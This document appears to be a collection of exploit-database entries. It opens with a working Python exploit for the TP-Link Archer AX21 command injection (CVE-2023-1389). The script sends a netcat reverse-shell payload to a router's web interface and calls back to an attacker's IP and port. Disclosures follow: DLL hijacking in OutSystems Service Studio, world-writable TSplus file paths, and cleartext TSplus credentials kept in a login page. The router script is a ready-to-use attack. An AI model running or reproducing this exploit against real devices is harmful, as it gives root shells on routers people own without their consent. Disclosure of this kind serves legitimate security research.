#!/usr/bin/python3 # # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection # Date: 07/25/2023 # Exploit Author: Voyag3r (https://github.com/Voyag3r-Security) # Vendor Homepage: https://www.tp-link.com/us/ # Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389) # Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0 # CVE: CVE-2023-1389 # # Disclaimer: This script is intended to be used for educational purposes only. # Do not run this against any system that you do not have permission to test. # The author will not be held responsible for any use or damage caused by this # program. # # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web # management interface of the TP-Link Archer AX21 (AX1800), specifically, in the # *country* parameter of the *write* callback for the *country* form at the # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is # possible to run commands as root. Execution requires sending the request twice; # the first request sets the command in the *country* value, and the second request # (which can be identical or not) executes it. # # This script is a short proof of concept to obtain a reverse shell. To read more # about the development of this script, you can read the blog post here: # https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94 # Before running the script, start a nc listener on your preferred port -> run the script -> profit import requests, urllib.parse, argparse from requests.packages.urllib3.exceptions import InsecureRequestWarning # Suppress warning for connecting to a router with a self-signed certificate requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Take user input for the router IP, and attacker IP and port parser = argparse.ArgumentParser() parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name") parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP") parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port") args = parser.parse_args() # Generate the reverse shell command with the attacker IP and port revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f") # URL to obtain the reverse shell url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")" # Send the URL twice to run the command. Sending twice is necessary for the attack r = requests.get(url_command, verify=False) r = requests.get(url_command, verify=False)

# Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking # Date: 2023-08-09 # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia # Vendor Homepage: https://www.outsystems.com/ # Version: Up to 11.53.30 (Build 61739) # Tested on: Windows # CVE : CVE-2022-47636 A DLL hijacking vulnerability has been discovered in OutSystems Service Studio 11 11.53.30 build 61739. When a user open a .oml file (OutSystems Modeling Language), the application will load the following DLLs from the same directory: av_libGLESv2.dll libcef.DLL user32.dll d3d10warp.dll Using a crafted DLL, it is possible to execute arbitrary code in the context of the current logged in user.

# Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions # Date: 2023-08-09 # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia # Vendor Homepage: https://tsplus.net/ # Version: Up to 16.0.2.14 # Tested on: Windows # CVE : CVE-2023-31067 TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and Microsoft RDS for remote desktop access and Windows application delivery. Web-enable your legacy apps, create SaaS solutions or remotely access your centralized corporate tools and files. The TSplus Remote Access solution comes with an embedded web server to allow remote users to easely connect remotely. However, insecure file and folder permissions are set and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-VirtualPrinter-Client.exe) in order to compromise a system or to gain elevated privileges. This is the list of insecure files and folders with their respective permissions: Everyone:(OI)(CF)(F) and Everyone(F) Permission: Everyone:(OI)(CI)(F) C:\Program Files (x86)\TSplus\Clients\www C:\Program Files (x86)\TSplus\Clients\www\addons C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient C:\Program Files (x86)\TSplus\Clients\www\downloads C:\Program Files (x86)\TSplus\Clients\www\prints C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient C:\Program Files (x86)\TSplus\Clients\www\software C:\Program Files (x86)\TSplus\Clients\www\var C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp C:\Program Files (x86)\TSplus\Clients\www\downloads\shared C:\Program Files (x86)\TSplus\Clients\www\software\java C:\Program Files (x86)\TSplus\Clients\www\software\js C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts C:\Program Files (x86)\TSplus\Clients\www\software\java\img C:\Program Files (x86)\TSplus\Clients\www\software\java\third C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images\bramus C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototype C:\Program Files (x86)\TSplus\Clients\www\var\log C:\Program Files (x86)\TSplus\UserDesktop\themes C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar C:\Program Files (x86)\TSplus\UserDesktop\themes\Default C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista ------------------------------------------------------------------------------ Permission: Everyone:(F) C:\Program Files (x86)\TSplus\Clients\www\all.min.css C:\Program Files (x86)\TSplus\Clients\www\custom.css C:\Program Files (x86)\TSplus\Clients\www\popins.css C:\Program Files (x86)\TSplus\Clients\www\robots.txt C:\Program Files (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html C:\Program Files (x86)\TSplus\Clients\www\software\common.css C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitlist.html C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitupload.html C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getlist.html C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getupload.html C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\postupload.html C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\uploaderr.html C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js

# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions # Date: 2023-08-09 # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia # Vendor Homepage: https://tsplus.net/ # Version: Up to 16.0.0.0 # Tested on: Windows # CVE : CVE-2023-31068 With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC. The solution comes with an embedded web server to allow remote users to easely connect remotely. However, insecure file and folder permissions are set, and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-RemoteWork-Client.exe) in order to compromise a system or to gain elevated privileges. This is the list of insecure files and folders with their respective permissions: Permission: Everyone:(OI)(CI)(F) C:\Program Files (x86)\TSplus-RemoteWork\Clients\www C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5 C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log ------------------------------------------------------------------------------------------- Permission: Everyone:(F) C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js

# Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage # Date: 2023-08-09 # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia # Vendor Homepage: https://tsplus.net/ # Version: Up to 16.0.0.0 # Tested on: Windows # CVE : CVE-2023-31069 With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC. It is possible to create a custom web portal login page which allows a user to login without providing their credentials. However, the credentials are stored in an insecure manner since they are saved in cleartext, within the html login page. This means that everyone with an access to the web login page, can easely retrieve the credentials to access to the application by simply looking at the html code page. This is a code snippet extracted by the source code of the login page (var user and var pass): // --------------- Access Configuration --------------- var user = "Admin"; // Login to use when connecting to the remote server (leave "" to use the login typed in this page) var pass = "SuperSecretPassword"; // Password to use when connecting to the remote server (leave "" to use the password typed in this page) var domain = ""; // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page) var server = "127.0.0.1"; // Server to connect to (leave "" to use localhost and/or the server chosen in this page) var port = ""; // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page) var lang = "as_browser"; // Language to use var serverhtml5 = "127.0.0.1"; // Server to connect to, when using HTML5 client var porthtml5 = "3389"; // Port to connect to, when using HTML5 client var cmdline = ""; // Optional text that will be put in the server's clipboard once connected // --------------- End of Access Configuration ---------------